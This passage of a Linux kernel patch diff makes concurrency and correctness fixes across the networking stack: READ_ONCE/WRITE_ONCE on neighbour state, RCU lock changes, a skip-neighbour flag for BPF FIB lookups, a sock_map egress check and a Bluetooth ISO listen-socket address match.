+@@ -466,7 +466,10 @@ static struct sock *__iso_get_sock_listen_by_addr(bdaddr_t *ba)
+ 		if (sk->sk_state != BT_LISTEN)
+ 			continue;
+ 
+-		if (!bacmp(&iso_pi(sk)->src, ba))
++		if (bacmp(&iso_pi(sk)->dst, dst))
++			continue;
++
++		if (!bacmp(&iso_pi(sk)->src, src))
+ 			return sk;
+ 	}
+ 
+@@ -910,7 +913,7 @@ static int iso_listen_cis(struct sock *sk)
+ 
+ 	write_lock(&iso_sk_list.lock);
+ 
+-	if (__iso_get_sock_listen_by_addr(&iso_pi(sk)->src))
++	if (__iso_get_sock_listen_by_addr(&iso_pi(sk)->src, &iso_pi(sk)->dst))
+ 		err = -EADDRINUSE;
+ 
+ 	write_unlock(&iso_sk_list.lock);
+diff --git a/net/bridge/br_arp_nd_proxy.c b/net/bridge/br_arp_nd_proxy.c
+index e5e48c6e35d78..b45c00c01dea1 100644
+--- a/net/bridge/br_arp_nd_proxy.c
++++ b/net/bridge/br_arp_nd_proxy.c
+@@ -192,7 +192,7 @@ void br_do_proxy_suppress_arp(struct sk_buff *skb, struct net_bridge *br,
+ 	if (n) {
+ 		struct net_bridge_fdb_entry *f;
+ 
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_release(n);
+ 			return;
+ 		}
+@@ -452,7 +452,7 @@ void br_do_suppress_nd(struct sk_buff *skb, struct net_bridge *br,
+ 	if (n) {
+ 		struct net_bridge_fdb_entry *f;
+ 
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_release(n);
+ 			return;
+ 		}
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 812bd7e1750b6..01d690d9fe5f8 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -277,7 +277,8 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 		struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 		int ret;
+ 
+-		if ((neigh->nud_state & NUD_CONNECTED) && neigh->hh.hh_len) {
++		if ((READ_ONCE(neigh->nud_state) & NUD_CONNECTED) &&
++		    READ_ONCE(neigh->hh.hh_len)) {
+ 			neigh_hh_bridge(&neigh->hh, skb);
+ 			skb->dev = nf_bridge->physindev;
+ 			ret = br_handle_frame_finish(net, sk, skb);
+@@ -293,7 +294,7 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 			/* tell br_dev_xmit to continue with forwarding */
+ 			nf_bridge->bridged_dnat = 1;
+ 			/* FIXME Need to refragment */
+-			ret = neigh->output(neigh, skb);
++			ret = READ_ONCE(neigh->output)(neigh, skb);
+ 		}
+ 		neigh_release(neigh);
+ 		return ret;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 9fd7c88b5db4e..adc327f4af1e9 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2197,7 +2197,7 @@ static int bpf_out_neigh_v6(struct net *net, struct sk_buff *skb,
+ 			return -ENOMEM;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	if (!nh) {
+ 		dst = skb_dst(skb);
+ 		nexthop = rt6_nexthop(container_of(dst, struct rt6_info, dst),
+@@ -2210,10 +2210,12 @@ static int bpf_out_neigh_v6(struct net *net, struct sk_buff *skb,
+ 		int ret;
+ 
+ 		sock_confirm_neigh(skb, neigh);
++		local_bh_disable();
+ 		dev_xmit_recursion_inc();
+ 		ret = neigh_output(neigh, skb, false);
+ 		dev_xmit_recursion_dec();
+-		rcu_read_unlock_bh();
++		local_bh_enable();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+ 	rcu_read_unlock_bh();
+@@ -2295,7 +2297,7 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 			return -ENOMEM;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	if (!nh) {
+ 		struct dst_entry *dst = skb_dst(skb);
+ 		struct rtable *rt = container_of(dst, struct rtable, dst);
+@@ -2307,7 +2309,7 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 	} else if (nh->nh_family == AF_INET) {
+ 		neigh = ip_neigh_gw4(dev, nh->ipv4_nh);
+ 	} else {
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		goto out_drop;
+ 	}
+ 
+@@ -2315,13 +2317,15 @@ static int bpf_out_neigh_v4(struct net *net, struct sk_buff *skb,
+ 		int ret;
+ 
+ 		sock_confirm_neigh(skb, neigh);
++		local_bh_disable();
+ 		dev_xmit_recursion_inc();
+ 		ret = neigh_output(neigh, skb, is_v6gw);
+ 		dev_xmit_recursion_dec();
+-		rcu_read_unlock_bh();
++		local_bh_enable();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ out_drop:
+ 	kfree_skb(skb);
+ 	return -ENETDOWN;
+@@ -5674,12 +5678,8 @@ static const struct bpf_func_proto bpf_skb_get_xfrm_state_proto = {
+ #endif
+ 
+ #if IS_ENABLED(CONFIG_INET) || IS_ENABLED(CONFIG_IPV6)
+-static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params,
+-				  const struct neighbour *neigh,
+-				  const struct net_device *dev, u32 mtu)
++static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
+ {
+-	memcpy(params->dmac, neigh->ha, ETH_ALEN);
+-	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 	params->h_vlan_TCI = 0;
+ 	params->h_vlan_proto = 0;
+ 	if (mtu)
+@@ -5790,21 +5790,29 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	if (likely(nhc->nhc_gw_family != AF_INET6)) {
+ 		if (nhc->nhc_gw_family)
+ 			params->ipv4_dst = nhc->nhc_gw.ipv4;
+-
+-		neigh = __ipv4_neigh_lookup_noref(dev,
+-						 (__force u32)params->ipv4_dst);
+ 	} else {
+ 		struct in6_addr *dst = (struct in6_addr *)params->ipv6_dst;
+ 
+ 		params->family = AF_INET6;
+ 		*dst = nhc->nhc_gw.ipv6;
+-		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh || !(neigh->nud_state & NUD_VALID))
++	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
++		goto set_fwd_params;
++
++	if (likely(nhc->nhc_gw_family != AF_INET6))
++		neigh = __ipv4_neigh_lookup_noref(dev,
++						  (__force u32)params->ipv4_dst);
++	else
++		neigh = __ipv6_neigh_lookup_noref_stub(dev, params->ipv6_dst);
++
++	if (!neigh || !(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
++	memcpy(params->dmac, neigh->ha, ETH_ALEN);
++	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 
+-	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
++set_fwd_params:
++	return bpf_fib_set_fwd_params(params, mtu);
+ }
+ #endif
+ 
+@@ -5912,24 +5920,33 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	params->rt_metric = res.f6i->fib6_metric;
+ 	params->ifindex = dev->ifindex;
+ 
++	if (flags & BPF_FIB_LOOKUP_SKIP_NEIGH)
++		goto set_fwd_params;
++
+ 	/* xdp and cls_bpf programs are run in RCU-bh so rcu_read_lock_bh is
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh || !(neigh->nud_state & NUD_VALID))
++	if (!neigh || !(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
++	memcpy(params->dmac, neigh->ha, ETH_ALEN);
++	memcpy(params->smac, dev->dev_addr, ETH_ALEN);
+ 
+-	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
++set_fwd_params:
++	return bpf_fib_set_fwd_params(params, mtu);
+ }
+ #endif
+ 
++#define BPF_FIB_LOOKUP_MASK (BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT | \
++			     BPF_FIB_LOOKUP_SKIP_NEIGH)
++
+ BPF_CALL_4(bpf_xdp_fib_lookup, struct xdp_buff *, ctx,
+ 	   struct bpf_fib_lookup *, params, int, plen, u32, flags)
+ {
+ 	if (plen < sizeof(*params))
+ 		return -EINVAL;
+ 
+-	if (flags & ~(BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT))
++	if (flags & ~BPF_FIB_LOOKUP_MASK)
+ 		return -EINVAL;
+ 
+ 	switch (params->family) {
+@@ -5967,7 +5984,7 @@ BPF_CALL_4(bpf_skb_fib_lookup, struct sk_buff *, skb,
+ 	if (plen < sizeof(*params))
+ 		return -EINVAL;
+ 
+-	if (flags & ~(BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_OUTPUT))
++	if (flags & ~BPF_FIB_LOOKUP_MASK)
+ 		return -EINVAL;
+ 
+ 	if (params->tot_len)
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 6c0f2149f2c72..b20c9768d9f3f 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -410,7 +410,7 @@ static void neigh_flush_dev(struct neigh_table *tbl, struct net_device *dev,
+ 				 */
+ 				__skb_queue_purge(&n->arp_queue);
+ 				n->arp_queue_len_bytes = 0;
+-				n->output = neigh_blackhole;
++				WRITE_ONCE(n->output, neigh_blackhole);
+ 				if (n->nud_state & NUD_VALID)
+ 					n->nud_state = NUD_NOARP;
+ 				else
+@@ -614,7 +614,7 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 
+ 	NEIGH_CACHE_STAT_INC(tbl, lookups);
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __neigh_lookup_noref(tbl, pkey, dev);
+ 	if (n) {
+ 		if (!refcount_inc_not_zero(&n->refcnt))
+@@ -622,7 +622,7 @@ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 		NEIGH_CACHE_STAT_INC(tbl, hits);
+ 	}
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	return n;
+ }
+ EXPORT_SYMBOL(neigh_lookup);
+@@ -920,7 +920,7 @@ static void neigh_suspect(struct neighbour *neigh)
+ {
+ 	neigh_dbg(2, "neigh %p is suspected\n", neigh);
+ 
+-	neigh->output = neigh->ops->output;
++	WRITE_ONCE(neigh->output, neigh->ops->output);
+ }
+ 
+ /* Neighbour state is OK;
+@@ -932,7 +932,7 @@ static void neigh_connect(struct neighbour *neigh)
+ {
+ 	neigh_dbg(2, "neigh %p is connected\n", neigh);
+ 
+-	neigh->output = neigh->ops->connected_output;
++	WRITE_ONCE(neigh->output, neigh->ops->connected_output);
+ }
+ 
+ static void neigh_periodic_work(struct work_struct *work)
+@@ -988,7 +988,9 @@ static void neigh_periodic_work(struct work_struct *work)
+ 			    (state == NUD_FAILED ||
+ 			     !time_in_range_open(jiffies, n->used,
+ 						 n->used + NEIGH_VAR(n->parms, GC_STALETIME)))) {
+-				*np = n->next;
++				rcu_assign_pointer(*np,
++					rcu_dereference_protected(n->next,
++						lockdep_is_held(&tbl->lock)));
+ 				neigh_mark_dead(n);
+ 				write_unlock(&n->lock);
+ 				neigh_cleanup_and_release(n);
+@@ -1093,13 +1095,13 @@ static void neigh_timer_handler(struct timer_list *t)
+ 					  neigh->used +
+ 					  NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME))) {
+ 			neigh_dbg(2, "neigh %p is delayed\n", neigh);
+-			neigh->nud_state = NUD_DELAY;
++			WRITE_ONCE(neigh->nud_state, NUD_DELAY);
+ 			neigh->updated = jiffies;
+ 			neigh_suspect(neigh);
+ 			next = now + NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME);
+ 		} else {
+ 			neigh_dbg(2, "neigh %p is suspected\n", neigh);
+-			neigh->nud_state = NUD_STALE;
++			WRITE_ONCE(neigh->nud_state, NUD_STALE);
+ 			neigh->updated = jiffies;
+ 			neigh_suspect(neigh);
+ 			notify = 1;
+@@ -1109,14 +1111,14 @@ static void neigh_timer_handler(struct timer_list *t)
+ 				   neigh->confirmed +
+ 				   NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME))) {
+ 			neigh_dbg(2, "neigh %p is now reachable\n", neigh);
+-			neigh->nud_state = NUD_REACHABLE;
++			WRITE_ONCE(neigh->nud_state, NUD_REACHABLE);
+ 			neigh->updated = jiffies;
+ 			neigh_connect(neigh);
+ 			notify = 1;
+ 			next = neigh->confirmed + neigh->parms->reachable_time;
+ 		} else {
+ 			neigh_dbg(2, "neigh %p is probed\n", neigh);
+-			neigh->nud_state = NUD_PROBE;
++			WRITE_ONCE(neigh->nud_state, NUD_PROBE);
+ 			neigh->updated = jiffies;
+ 			atomic_set(&neigh->probes, 0);
+ 			notify = 1;
+@@ -1130,7 +1132,7 @@ static void neigh_timer_handler(struct timer_list *t)
+ 
+ 	if ((neigh->nud_state & (NUD_INCOMPLETE | NUD_PROBE)) &&
+ 	    atomic_read(&neigh->probes) >= neigh_max_probes(neigh)) {
+-		neigh->nud_state = NUD_FAILED;
++		WRITE_ONCE(neigh->nud_state, NUD_FAILED);
+ 		notify = 1;
+ 		neigh_invalidate(neigh);
+ 		goto out;
+@@ -1179,7 +1181,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 			atomic_set(&neigh->probes,
+ 				   NEIGH_VAR(neigh->parms, UCAST_PROBES));
+ 			neigh_del_timer(neigh);
+-			neigh->nud_state = NUD_INCOMPLETE;
++			WRITE_ONCE(neigh->nud_state, NUD_INCOMPLETE);
+ 			neigh->updated = now;
+ 			if (!immediate_ok) {
+ 				next = now + 1;
+@@ -1191,7 +1193,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 			}
+ 			neigh_add_timer(neigh, next);
+ 		} else {
+-			neigh->nud_state = NUD_FAILED;
++			WRITE_ONCE(neigh->nud_state, NUD_FAILED);
+ 			neigh->updated = jiffies;
+ 			write_unlock_bh(&neigh->lock);
+ 
+@@ -1201,7 +1203,7 @@ int __neigh_event_send(struct neighbour *neigh, struct sk_buff *skb,
+ 	} else if (neigh->nud_state & NUD_STALE) {
+ 		neigh_dbg(2, "neigh %p is delayed\n", neigh);
+ 		neigh_del_timer(neigh);
+-		neigh->nud_state = NUD_DELAY;
++		WRITE_ONCE(neigh->nud_state, NUD_DELAY);
+ 		neigh->updated = jiffies;
+ 		neigh_add_timer(neigh, jiffies +
+ 				NEIGH_VAR(neigh->parms, DELAY_PROBE_TIME));
+@@ -1313,7 +1315,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 	neigh_update_flags(neigh, flags, &notify, &gc_update, &managed_update);
+ 	if (flags & (NEIGH_UPDATE_F_USE | NEIGH_UPDATE_F_MANAGED)) {
+ 		new = old & ~NUD_PERMANENT;
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		err = 0;
+ 		goto out;
+ 	}
+@@ -1322,7 +1324,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 		neigh_del_timer(neigh);
+ 		if (old & NUD_CONNECTED)
+ 			neigh_suspect(neigh);
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		err = 0;
+ 		notify = old & NUD_VALID;
+ 		if ((old & (NUD_INCOMPLETE | NUD_PROBE)) &&
+@@ -1401,7 +1403,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 						((new & NUD_REACHABLE) ?
+ 						 neigh->parms->reachable_time :
+ 						 0)));
+-		neigh->nud_state = new;
++		WRITE_ONCE(neigh->nud_state, new);
+ 		notify = 1;
+ 	}
+ 
+@@ -1447,7 +1449,7 @@ static int __neigh_update(struct neighbour *neigh, const u8 *lladdr,
+ 				if (n2)
+ 					n1 = n2;
+ 			}
+-			n1->output(n1, skb);
++			READ_ONCE(n1->output)(n1, skb);
+ 			if (n2)
+ 				neigh_release(n2);
+ 			rcu_read_unlock();
+@@ -1488,7 +1490,7 @@ void __neigh_set_probe_once(struct neighbour *neigh)
+ 	neigh->updated = jiffies;
+ 	if (!(neigh->nud_state & NUD_FAILED))
+ 		return;
+-	neigh->nud_state = NUD_INCOMPLETE;
++	WRITE_ONCE(neigh->nud_state, NUD_INCOMPLETE);
+ 	atomic_set(&neigh->probes, neigh_max_probes(neigh));
+ 	neigh_add_timer(neigh,
+ 			jiffies + max(NEIGH_VAR(neigh->parms, RETRANS_TIME),
+@@ -2174,11 +2176,11 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			.ndtc_proxy_qlen	= tbl->proxy_queue.qlen,
+ 		};
+ 
+-		rcu_read_lock_bh();
+-		nht = rcu_dereference_bh(tbl->nht);
++		rcu_read_lock();
++		nht = rcu_dereference(tbl->nht);
+ 		ndc.ndtc_hash_rnd = nht->hash_rnd[0];
+ 		ndc.ndtc_hash_mask = ((1 << nht->hash_shift) - 1);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 
+ 		if (nla_put(skb, NDTA_CONFIG, sizeof(ndc), &ndc))
+ 			goto nla_put_failure;
+@@ -2693,15 +2695,15 @@ static int neigh_dump_table(struct neigh_table *tbl, struct sk_buff *skb,
+ 	if (filter->dev_idx || filter->master_idx)
+ 		flags |= NLM_F_DUMP_FILTERED;
+ 
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
++	rcu_read_lock();
++	nht = rcu_dereference(tbl->nht);
+ 
+ 	for (h = s_h; h < (1 << nht->hash_shift); h++) {
+ 		if (h > s_h)
+ 			s_idx = 0;
+-		for (n = rcu_dereference_bh(nht->hash_buckets[h]), idx = 0;
++		for (n = rcu_dereference(nht->hash_buckets[h]), idx = 0;
+ 		     n != NULL;
+-		     n = rcu_dereference_bh(n->next)) {
++		     n = rcu_dereference(n->next)) {
+ 			if (idx < s_idx || !net_eq(dev_net(n->dev), net))
+ 				goto next;
+ 			if (neigh_ifindex_filtered(n->dev, filter->dev_idx) ||
+@@ -2720,7 +2722,7 @@ next:
+ 	}
+ 	rc = skb->len;
+ out:
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	cb->args[1] = h;
+ 	cb->args[2] = idx;
+ 	return rc;
+@@ -3065,20 +3067,20 @@ void neigh_for_each(struct neigh_table *tbl, void (*cb)(struct neighbour *, void
+ 	int chain;
+ 	struct neigh_hash_table *nht;
+ 
+-	rcu_read_lock_bh();
+-	nht = rcu_dereference_bh(tbl->nht);
++	rcu_read_lock();
++	nht = rcu_dereference(tbl->nht);
+ 
+-	read_lock(&tbl->lock); /* avoid resizes */
++	read_lock_bh(&tbl->lock); /* avoid resizes */
+ 	for (chain = 0; chain < (1 << nht->hash_shift); chain++) {
+ 		struct neighbour *n;
+ 
+-		for (n = rcu_dereference_bh(nht->hash_buckets[chain]);
++		for (n = rcu_dereference(nht->hash_buckets[chain]);
+ 		     n != NULL;
+-		     n = rcu_dereference_bh(n->next))
++		     n = rcu_dereference(n->next))
+ 			cb(n, cookie);
+ 	}
+-	read_unlock(&tbl->lock);
+-	rcu_read_unlock_bh();
++	read_unlock_bh(&tbl->lock);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL(neigh_for_each);
+ 
+@@ -3128,7 +3130,7 @@ int neigh_xmit(int index, struct net_device *dev,
+ 		tbl = neigh_tables[index];
+ 		if (!tbl)
+ 			goto out;
+-		rcu_read_lock_bh();
++		rcu_read_lock();
+ 		if (index == NEIGH_ARP_TABLE) {
+ 			u32 key = *((u32 *)addr);
+ 
+@@ -3140,11 +3142,11 @@ int neigh_xmit(int index, struct net_device *dev,
+ 			neigh = __neigh_create(tbl, addr, dev, false);
+ 		err = PTR_ERR(neigh);
+ 		if (IS_ERR(neigh)) {
+-			rcu_read_unlock_bh();
++			rcu_read_unlock();
+ 			goto out_kfree_skb;
+ 		}
+-		err = neigh->output(neigh, skb);
+-		rcu_read_unlock_bh();
++		err = READ_ONCE(neigh->output)(neigh, skb);
++		rcu_read_unlock();
+ 	}
+ 	else if (index == NEIGH_LINK_TABLE) {
+ 		err = dev_hard_header(skb, dev, ntohs(skb->protocol),
+@@ -3173,7 +3175,7 @@ static struct neighbour *neigh_get_first(struct seq_file *seq)
+ 
+ 	state->flags &= ~NEIGH_SEQ_IS_PNEIGH;
+ 	for (bucket = 0; bucket < (1 << nht->hash_shift); bucket++) {
+-		n = rcu_dereference_bh(nht->hash_buckets[bucket]);
++		n = rcu_dereference(nht->hash_buckets[bucket]);
+ 
+ 		while (n) {
+ 			if (!net_eq(dev_net(n->dev), net))
+@@ -3188,10 +3190,10 @@ static struct neighbour *neigh_get_first(struct seq_file *seq)
+ 			}
+ 			if (!(state->flags & NEIGH_SEQ_SKIP_NOARP))
+ 				break;
+-			if (n->nud_state & ~NUD_NOARP)
++			if (READ_ONCE(n->nud_state) & ~NUD_NOARP)
+ 				break;
+ next:
+-			n = rcu_dereference_bh(n->next);
++			n = rcu_dereference(n->next);
+ 		}
+ 
+ 		if (n)
+@@ -3215,7 +3217,7 @@ static struct neighbour *neigh_get_next(struct seq_file *seq,
+ 		if (v)
+ 			return n;
+ 	}
+-	n = rcu_dereference_bh(n->next);
++	n = rcu_dereference(n->next);
+ 
+ 	while (1) {
+ 		while (n) {
+@@ -3230,10 +3232,10 @@ static struct neighbour *neigh_get_next(struct seq_file *seq,
+ 			if (!(state->flags & NEIGH_SEQ_SKIP_NOARP))
+ 				break;
+ 
+-			if (n->nud_state & ~NUD_NOARP)
++			if (READ_ONCE(n->nud_state) & ~NUD_NOARP)
+ 				break;
+ next:
+-			n = rcu_dereference_bh(n->next);
++			n = rcu_dereference(n->next);
+ 		}
+ 
+ 		if (n)
+@@ -3242,7 +3244,7 @@ next:
+ 		if (++state->bucket >= (1 << nht->hash_shift))
+ 			break;
+ 
+-		n = rcu_dereference_bh(nht->hash_buckets[state->bucket]);
++		n = rcu_dereference(nht->hash_buckets[state->bucket]);
+ 	}
+ 
+ 	if (n && pos)
+@@ -3344,7 +3346,7 @@ static void *neigh_get_idx_any(struct seq_file *seq, loff_t *pos)
+ 
+ void *neigh_seq_start(struct seq_file *seq, loff_t *pos, struct neigh_table *tbl, unsigned int neigh_seq_flags)
+ 	__acquires(tbl->lock)
+-	__acquires(rcu_bh)
++	__acquires(rcu)
+ {
+ 	struct neigh_seq_state *state = seq->private;
+ 
+@@ -3352,9 +3354,9 @@ void *neigh_seq_start(struct seq_file *seq, loff_t *pos, struct neigh_table *tbl
+ 	state->bucket = 0;
+ 	state->flags = (neigh_seq_flags & ~NEIGH_SEQ_IS_PNEIGH);
+ 
+-	rcu_read_lock_bh();
+-	state->nht = rcu_dereference_bh(tbl->nht);
+-	read_lock(&tbl->lock);
++	rcu_read_lock();
++	state->nht = rcu_dereference(tbl->nht);
++	read_lock_bh(&tbl->lock);
+ 
+ 	return *pos ? neigh_get_idx_any(seq, pos) : SEQ_START_TOKEN;
+ }
+@@ -3389,13 +3391,13 @@ EXPORT_SYMBOL(neigh_seq_next);
+ 
+ void neigh_seq_stop(struct seq_file *seq, void *v)
+ 	__releases(tbl->lock)
+-	__releases(rcu_bh)
++	__releases(rcu)
+ {
+ 	struct neigh_seq_state *state = seq->private;
+ 	struct neigh_table *tbl = state->tbl;
+ 
+-	read_unlock(&tbl->lock);
+-	rcu_read_unlock_bh();
++	read_unlock_bh(&tbl->lock);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL(neigh_seq_stop);
+ 
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 96db7409baa12..38e01f82f2ef3 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -670,6 +670,8 @@ BPF_CALL_4(bpf_msg_redirect_map, struct sk_msg *, msg,
+ 	sk = __sock_map_lookup_elem(map, key);
+ 	if (unlikely(!sk || !sock_map_redirect_allowed(sk)))
+ 		return SK_DROP;
++	if (!(flags & BPF_F_INGRESS) && !sk_is_tcp(sk))
++		return SK_DROP;
+ 
+ 	msg->flags = flags;
+ 	msg->sk_redir = sk;
+@@ -1262,6 +1264,8 @@ BPF_CALL_4(bpf_msg_redirect_hash, struct sk_msg *, msg,
+ 	sk = __sock_hash_lookup_elem(map, key);
+ 	if (unlikely(!sk || !sock_map_redirect_allowed(sk)))
+ 		return SK_DROP;
++	if (!(flags & BPF_F_INGRESS) && !sk_is_tcp(sk))
++		return SK_DROP;
+ 
+ 	msg->flags = flags;
+ 	msg->sk_redir = sk;
+diff --git a/net/ipv4/arp.c b/net/ipv4/arp.c
+index 4f7237661afb9..9456f5bb35e5d 100644
+--- a/net/ipv4/arp.c
++++ b/net/ipv4/arp.c
+@@ -375,7 +375,7 @@ static void arp_solicit(struct neighbour *neigh, struct sk_buff *skb)
+ 
+ 	probes -= NEIGH_VAR(neigh->parms, UCAST_PROBES);
+ 	if (probes < 0) {
+-		if (!(neigh->nud_state & NUD_VALID))
++		if (!(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 			pr_debug("trying to ucast probe in NUD_INVALID\n");
+ 		neigh_ha_snapshot(dst_ha, neigh, dev);
+ 		dst_hw = dst_ha;
+@@ -1123,7 +1123,7 @@ static int arp_req_get(struct arpreq *r, struct net_device *dev)
+ 
+ 	neigh = neigh_lookup(&arp_tbl, &ip, dev);
+ 	if (neigh) {
+-		if (!(neigh->nud_state & NUD_NOARP)) {
++		if (!(READ_ONCE(neigh->nud_state) & NUD_NOARP)) {
+ 			read_lock_bh(&neigh->lock);
+ 			memcpy(r->arp_ha.sa_data, neigh->ha, dev->addr_len);
+ 			r->arp_flags = arp_state_to_flags(neigh);
+@@ -1144,12 +1144,12 @@ int arp_invalidate(struct net_device *dev, __be32 ip, bool force)
+ 	struct neigh_table *tbl = &arp_tbl;
+ 
+ 	if (neigh) {
+-		if ((neigh->nud_state & NUD_VALID) && !force) {
++		if ((READ_ONCE(neigh->nud_state) & NUD_VALID) && !force) {
+ 			neigh_release(neigh);
+ 			return 0;
+ 		}
+ 
+-		if (neigh->nud_state & ~NUD_NOARP)
++		if (READ_ONCE(neigh->nud_state) & ~NUD_NOARP)
+ 			err = neigh_update(neigh, NULL, NUD_FAILED,
+ 					   NEIGH_UPDATE_F_OVERRIDE|
+ 					   NEIGH_UPDATE_F_ADMIN, 0);
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 3b6e6bc80dc1c..eafa4a0335157 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -564,7 +564,7 @@ static int fib_detect_death(struct fib_info *fi, int order,
+ 		n = NULL;
+ 
+ 	if (n) {
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 		neigh_release(n);
+ 	} else {
+ 		return 0;
+@@ -2194,7 +2194,7 @@ static bool fib_good_nh(const struct fib_nh *nh)
+ 	if (nh->fib_nh_scope == RT_SCOPE_LINK) {
+ 		struct neighbour *n;
+ 
+-		rcu_read_lock_bh();
++		rcu_read_lock();
+ 
+ 		if (likely(nh->fib_nh_gw_family == AF_INET))
+ 			n = __ipv4_neigh_lookup_noref(nh->fib_nh_dev,
+@@ -2205,9 +2205,9 @@ static bool fib_good_nh(const struct fib_nh *nh)
+ 		else
+ 			n = NULL;
+ 		if (n)
+-			state = n->nud_state;
++			state = READ_ONCE(n->nud_state);
+ 
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 	}
+ 
+ 	return !!(state & NUD_VALID);
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 66908ce2dd116..493c679ea54f3 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -218,7 +218,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 			return res;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	neigh = ip_neigh_for_gw(rt, skb, &is_v6gw);
+ 	if (!IS_ERR(neigh)) {
+ 		int res;
+@@ -226,10 +226,10 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 		sock_confirm_neigh(skb, neigh);
+ 		/* if crossing protocols, can not use the cached header */
+ 		res = neigh_output(neigh, skb, is_v6gw);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return res;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	net_dbg_ratelimited("%s: No header cache and no neighbour!\n",
+ 			    __func__);
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index 9cc2879024541..be5498f5dd319 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -1124,13 +1124,13 @@ static bool ipv6_good_nh(const struct fib6_nh *nh)
+ 	int state = NUD_REACHABLE;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	n = __ipv6_neigh_lookup_noref_stub(nh->fib_nh_dev, &nh->fib_nh_gw6);
+ 	if (n)
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return !!(state & NUD_VALID);
+ }
